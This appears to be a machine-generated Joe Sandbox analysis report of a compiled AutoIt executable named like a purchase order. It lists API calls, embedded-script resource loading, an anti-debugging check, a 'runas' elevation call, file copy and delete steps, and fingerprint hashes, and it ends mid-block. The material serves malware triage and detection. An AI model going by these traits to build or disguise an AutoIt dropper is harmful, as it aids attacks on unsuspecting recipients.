• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• Opcode ID: 0392782ca0d5fd56a02300eade9e0b7e1bd58da7da6279f9834b0aa1e8eb0bd3
• Instruction ID: cefd7be4dd37120d733f1af1058078b302d14d19125ab82cf4dad81601c28e95
• Opcode Fuzzy Hash: 0392782ca0d5fd56a02300eade9e0b7e1bd58da7da6279f9834b0aa1e8eb0bd3
• Instruction Fuzzy Hash: 45327075B022188FCB249F15DC416EAB7B5FF46314F1440EAE40AE7A91D7349E80CF9A

Control-flow Graph

(graph image not reproduced)

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003E3AA3,?), ref: 003E3D45
• IsDebuggerPresent.KERNEL32(?,?,?,?,003E3AA3,?), ref: 003E3D57
• GetFullPathNameW.KERNEL32(00007FFF,?,?,004A1148,004A1130,?,?,?,?,003E3AA3,?), ref: 003E3DC8
  • Part of subcall function 003E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003E3DEE,004A1148,?,?,?,?,?,003E3AA3,?), ref: 003E6471
• SetCurrentDirectoryW.KERNEL32(?,?,?,003E3AA3,?), ref: 003E3E48
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004928F4,00000010), ref: 00451CCE
• SetCurrentDirectoryW.KERNEL32(?,004A1148,?,?,?,?,?,003E3AA3,?), ref: 00451D06
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0047DAB4,004A1148,?,?,?,?,?,003E3AA3,?), ref: 00451D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,003E3AA3), ref: 00451D90
  • Part of subcall function 003E3E6E: GetSysColorBrush.USER32(0000000F), ref: 003E3E79
  • Part of subcall function 003E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 003E3E88
  • Part of subcall function 003E3E6E: LoadIconW.USER32(00000063), ref: 003E3E9E
  • Part of subcall function 003E3E6E: LoadIconW.USER32(000000A4), ref: 003E3EB0
  • Part of subcall function 003E3E6E: LoadIconW.USER32(000000A2), ref: 003E3EC2
  • Part of subcall function 003E3E6E: RegisterClassExW.USER32(?), ref: 003E3F30
  • Part of subcall function 003E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003E36E6
  • Part of subcall function 003E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003E3707
  • Part of subcall function 003E36B8: ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E371B
  • Part of subcall function 003E36B8: ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E3724
  • Part of subcall function 003E4FFC: _memset.LIBCMT ref: 003E5022
  • Part of subcall function 003E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003E50CB
Similarity
• API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: ()I$This is a third-party compiled AutoIt script.$runas
• API String ID: 438480954-3894604172
• Opcode ID: 7550514949c9587d2be195316fecc8eba9668c63d1381a413a0af0d09dfb6bc7
• Instruction ID: 577f520411a636e97d5bb4cc3ff214bbcbaf1e03b3d0cb1c9d22607089a7990a
• Opcode Fuzzy Hash: 7550514949c9587d2be195316fecc8eba9668c63d1381a413a0af0d09dfb6bc7
• Instruction Fuzzy Hash: AC514A31E042E8AACF03ABB2DC05EEE7F799F5A704F004235F5016B1E2DAB84549CB25

Control-flow Graph

(graph image not reproduced; legend: Executed / Not Executed)
                                                                                                              APIs
                                                                                                              • GetVersionExW.KERNEL32(?), ref: 003FDDEC
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0047DC38,?,?), ref: 003FDEAC
                                                                                                              • GetNativeSystemInfo.KERNELBASE(?,0047DC38,?,?), ref: 003FDF01
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 003FDF0C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 003FDF1F
                                                                                                              • GetSystemInfo.KERNEL32(?,0047DC38,?,?), ref: 003FDF29
                                                                                                              • GetSystemInfo.KERNEL32(?,0047DC38,?,?), ref: 003FDF35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                              • String ID:
                                                                                                              • API String ID: 3851250370-0
                                                                                                              • Opcode ID: 3dd72e0a12ad8e4174eb1546e65adaede3da23c1a96c4eb91815881611bfb99f
                                                                                                              • Instruction ID: 84cd2df2f002477baa9063bbf7a1c21667a4ce6529c9090d0072322383340c23
                                                                                                              • Opcode Fuzzy Hash: 3dd72e0a12ad8e4174eb1546e65adaede3da23c1a96c4eb91815881611bfb99f
                                                                                                              • Instruction Fuzzy Hash: 1E61D37180A388DFCF16CF6898C45E97FB56F3A300B1985D9D8459F207C664C909CB6A

                                                                                                              Control-flow Graph (rendered as an image in the report; executed and not-executed blocks are colour-coded there)
                                                                                                              • Function 003E406B-003E4083: calls CreateStreamOnHGlobal, then FindResourceExW; on success it continues through LoadResource, SizeofResource and LockResource in the block range 00454F16-00454F6E, and a failure at any of these steps branches to the common exit block at 003E40A2. The full block-to-block edge list is omitted here.
                                                                                                              APIs
                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003E449E,?,?,00000000,00000001), ref: 003E407B
                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003E449E,?,?,00000000,00000001), ref: 003E4092
                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB), ref: 00454F1A
                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB), ref: 00454F2F
                                                                                                              • LockResource.KERNEL32(003E449E,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB,00000000), ref: 00454F42
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                              • String ID: SCRIPT
                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                              • Opcode ID: 62bce858b2515d6cf90dada56f144fa907e9a08e8a6249d4372577222e0d154a
                                                                                                              • Instruction ID: 17ca9b9ddbeeed006eebe12b68304db5c969e881cb1070e8d4332339b8003086
                                                                                                              • Opcode Fuzzy Hash: 62bce858b2515d6cf90dada56f144fa907e9a08e8a6249d4372577222e0d154a
                                                                                                              • Instruction Fuzzy Hash: 84115E71600751BFE7219B66DC48F27BBB9EBC9B51F10457CF60286290DAB1DC049A21
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00452F49), ref: 00426CB9
                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00426CCA
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00426CDA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 48322524-0
                                                                                                              • Opcode ID: e69c515ce120e4503e3d3f1c85684851a07167057437746837c68762f5429e87
                                                                                                              • Instruction ID: 51f58c43466355f73eb744fdb187186b43feac5b4e81002f6d40d70b86ae28fb
                                                                                                              • Opcode Fuzzy Hash: e69c515ce120e4503e3d3f1c85684851a07167057437746837c68762f5429e87
                                                                                                              • Instruction Fuzzy Hash: 06E09231E104205782146738AC094EA36ACDA0A339B500716F471C12D0EBF49900859E
                                                                                                              APIs
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003EE959
                                                                                                              • timeGetTime.WINMM ref: 003EEBFA
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003EED2E
                                                                                                              • TranslateMessage.USER32(?), ref: 003EED3F
                                                                                                              • DispatchMessageW.USER32(?), ref: 003EED4A
                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 003EED79
                                                                                                              • DestroyWindow.USER32 ref: 003EED85
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EED9F
                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00455270
                                                                                                              • TranslateMessage.USER32(?), ref: 004559F7
                                                                                                              • DispatchMessageW.USER32(?), ref: 00455A05
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00455A19
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                              • API String ID: 2641332412-570651680
                                                                                                              • Opcode ID: 7754ddeaa30be64e0dab04ce436724a42763f6a822a8b76f05af5e1af7ff072d
                                                                                                              • Instruction ID: 4a2dcaf2fe540cd95f00722cba2f25f88af7fcbedffc30376e68156cafa3960b
                                                                                                              • Opcode Fuzzy Hash: 7754ddeaa30be64e0dab04ce436724a42763f6a822a8b76f05af5e1af7ff072d
                                                                                                              • Instruction Fuzzy Hash: 7362D270508390DFDB22DF25C895BAA77E4BF44304F144A7EF9468B2E2DBB49848CB56
                                                                                                              APIs
                                                                                                              • ___createFile.LIBCMT ref: 00415EC3
                                                                                                              • ___createFile.LIBCMT ref: 00415F04
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00415F2D
                                                                                                              • __dosmaperr.LIBCMT ref: 00415F34
                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00415F47
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00415F6A
                                                                                                              • __dosmaperr.LIBCMT ref: 00415F73
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00415F7C
                                                                                                              • __set_osfhnd.LIBCMT ref: 00415FAC
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 00416016
                                                                                                              • __close_nolock.LIBCMT ref: 0041603C
                                                                                                              • __chsize_nolock.LIBCMT ref: 0041606C
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041607E
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 00416176
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041618B
                                                                                                              • __close_nolock.LIBCMT ref: 004161EB
                                                                                                                • Part of subcall function 0040EA9C: CloseHandle.KERNELBASE(00000000,0048EEF4,00000000,?,00416041,0048EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0040EAEC
                                                                                                                • Part of subcall function 0040EA9C: GetLastError.KERNEL32(?,00416041,0048EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0040EAF6
                                                                                                                • Part of subcall function 0040EA9C: __free_osfhnd.LIBCMT ref: 0040EB03
                                                                                                                • Part of subcall function 0040EA9C: __dosmaperr.LIBCMT ref: 0040EB25
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041620D
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00416342
                                                                                                              • ___createFile.LIBCMT ref: 00416361
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0041636E
                                                                                                              • __dosmaperr.LIBCMT ref: 00416375
                                                                                                              • __free_osfhnd.LIBCMT ref: 00416395
                                                                                                              • __invoke_watson.LIBCMT ref: 004163C3
                                                                                                              • __wsopen_helper.LIBCMT ref: 004163DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                              • String ID: @
                                                                                                              • API String ID: 3896587723-2766056989
                                                                                                              • Opcode ID: e5c173e0cc136fd31e52e3bcd625179dfe831a1c74625de8d1dff435aeab6c5e
                                                                                                              • Instruction ID: 7f2a5a8ab6f4f6690cf8a04715001375f5d69ae379ead3738684a12ac0e51cb3
                                                                                                              • Opcode Fuzzy Hash: e5c173e0cc136fd31e52e3bcd625179dfe831a1c74625de8d1dff435aeab6c5e
                                                                                                              • Instruction Fuzzy Hash: 50222371D006099BEB259F68D845BEE7B21EB44314F29826BE921A73D1C33DCDC1C79A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • _wcscpy.LIBCMT ref: 0042FA96
                                                                                                              • _wcschr.LIBCMT ref: 0042FAA4
                                                                                                              • _wcscpy.LIBCMT ref: 0042FABB
                                                                                                              • _wcscat.LIBCMT ref: 0042FACA
                                                                                                              • _wcscat.LIBCMT ref: 0042FAE8
                                                                                                              • _wcscpy.LIBCMT ref: 0042FB09
                                                                                                              • __wsplitpath.LIBCMT ref: 0042FBE6
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC0B
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC1D
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC32
                                                                                                              • _wcscat.LIBCMT ref: 0042FC47
                                                                                                              • _wcscat.LIBCMT ref: 0042FC59
                                                                                                              • _wcscat.LIBCMT ref: 0042FC6E
                                                                                                                • Part of subcall function 0042BFA4: _wcscmp.LIBCMT ref: 0042C03E
                                                                                                                • Part of subcall function 0042BFA4: __wsplitpath.LIBCMT ref: 0042C083
                                                                                                                • Part of subcall function 0042BFA4: _wcscpy.LIBCMT ref: 0042C096
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0A9
                                                                                                                • Part of subcall function 0042BFA4: __wsplitpath.LIBCMT ref: 0042C0CE
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0E4
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0F7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2I
                                                                                                              • API String ID: 2955681530-2204676061
                                                                                                              • Opcode ID: 9cb56f4fc2552fd35637aa1b56082dea1765464a64e573ef4b0a3c41740ec05b
                                                                                                              • Instruction ID: 646c6345df49ba36c05d2480a06a287551d983ebe55b546da0d6da86b705e84a
                                                                                                              • Opcode Fuzzy Hash: 9cb56f4fc2552fd35637aa1b56082dea1765464a64e573ef4b0a3c41740ec05b
                                                                                                              • Instruction Fuzzy Hash: D291D3716042149FDB11EB51D841F9BB3E8BF54304F40493EF9499B292DB38FA48CB96

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 003E3F86
                                                                                                              • RegisterClassExW.USER32(00000030), ref: 003E3FB0
                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E3FC1
                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 003E3FDE
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003E3FEE
                                                                                                              • LoadIconW.USER32(000000A9), ref: 003E4004
                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003E4013
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                              • Opcode ID: f1c33ee514ce7a7ab41b3e47925842b238be54640d89ac7604423ea7658be046
                                                                                                              • Instruction ID: 999611ca09890f9d2bcb969d9d4d419695e77350bf743dcee639edfb5159e4e2
                                                                                                              • Opcode Fuzzy Hash: f1c33ee514ce7a7ab41b3e47925842b238be54640d89ac7604423ea7658be046
                                                                                                              • Instruction Fuzzy Hash: 7621C5B5E00218AFDB00DFA5EC89BCDBFB4FB09705F04412AF615A62A0E7B545448F9A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0042BDB4: __time64.LIBCMT ref: 0042BDBE
                                                                                                                • Part of subcall function 003E4517: _fseek.LIBCMT ref: 003E452F
                                                                                                              • __wsplitpath.LIBCMT ref: 0042C083
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscpy.LIBCMT ref: 0042C096
                                                                                                              • _wcscat.LIBCMT ref: 0042C0A9
                                                                                                              • __wsplitpath.LIBCMT ref: 0042C0CE
                                                                                                              • _wcscat.LIBCMT ref: 0042C0E4
                                                                                                              • _wcscat.LIBCMT ref: 0042C0F7
                                                                                                              • _wcscmp.LIBCMT ref: 0042C03E
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C65D
                                                                                                                • Part of subcall function 0042C56D: _wcscmp.LIBCMT ref: 0042C670
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0042C2A1
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042C338
                                                                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0042C34E
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0042C35F
                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0042C371
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 2378138488-0
                                                                                                              • Opcode ID: 42baab75af72f281043de97a5bb2d2df80214d8894953ea24dd74c92b8acd4fa
                                                                                                              • Instruction ID: 64bfa6ec34809298d50669a82458e2d201cc04f8aba60ff6dec99fa596d502a1
                                                                                                              • Opcode Fuzzy Hash: 42baab75af72f281043de97a5bb2d2df80214d8894953ea24dd74c92b8acd4fa
                                                                                                              • Instruction Fuzzy Hash: 35C15BB1E00229ABDF11DF96DC81EDEB7BCAF48304F4040ABF609E6151DB749A848F65

                                                                                                              Control-flow Graph

                                                                                                               Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block 3e3742-3e3762. Blocks with API calls: 3e37ab-3e37b3 DefWindowProcW; 3e37da-3e37ed KillTimer; 3e37f6-3e381d SetTimer, RegisterWindowMessageW; 3e381f-3e382a CreatePopupMenu; 3e382c-3e3834 PostQuitMessage; 451dcb-451dd7 SetFocus; 451ddc-451dfb MoveWindow. Internal calls: 3e2ff6, 3fe312, 424ddd, 3feb83, 3e3847, 3e390f, 41a5f3, 4255bd, 3e4ffc. Edge list omitted.
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 003E37B3
                                                                                                              • KillTimer.USER32(?,00000001), ref: 003E37DD
                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003E3800
                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E380B
                                                                                                              • CreatePopupMenu.USER32 ref: 003E381F
                                                                                                              • PostQuitMessage.USER32(00000000), ref: 003E382E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                              • String ID: TaskbarCreated
                                                                                                              • API String ID: 129472671-2362178303
                                                                                                              • Opcode ID: ccbdc453575dec10d4993c3a7d0bec369232b0c1f5af0fd1828a5730cd454aea
                                                                                                              • Instruction ID: bca174efa76e374b71df74706ca2598f8a191c498eeb5cb9519d7dfa3615f640
                                                                                                              • Opcode Fuzzy Hash: ccbdc453575dec10d4993c3a7d0bec369232b0c1f5af0fd1828a5730cd454aea
                                                                                                              • Instruction Fuzzy Hash: E24169F56081F5ABDB165B6ADC4EB7A3A59FB01301F000336F912E79F1DB649E40872A

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 003E3E79
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 003E3E88
                                                                                                              • LoadIconW.USER32(00000063), ref: 003E3E9E
                                                                                                              • LoadIconW.USER32(000000A4), ref: 003E3EB0
                                                                                                              • LoadIconW.USER32(000000A2), ref: 003E3EC2
                                                                                                                • Part of subcall function 003E4024: LoadImageW.USER32(003E0000,00000063,00000001,00000010,00000010,00000000), ref: 003E4048
                                                                                                              • RegisterClassExW.USER32(?), ref: 003E3F30
                                                                                                                • Part of subcall function 003E3F53: GetSysColorBrush.USER32(0000000F), ref: 003E3F86
                                                                                                                • Part of subcall function 003E3F53: RegisterClassExW.USER32(00000030), ref: 003E3FB0
                                                                                                                • Part of subcall function 003E3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003E3FC1
                                                                                                                • Part of subcall function 003E3F53: InitCommonControlsEx.COMCTL32(?), ref: 003E3FDE
                                                                                                                • Part of subcall function 003E3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003E3FEE
                                                                                                                • Part of subcall function 003E3F53: LoadIconW.USER32(000000A9), ref: 003E4004
                                                                                                                • Part of subcall function 003E3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003E4013
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
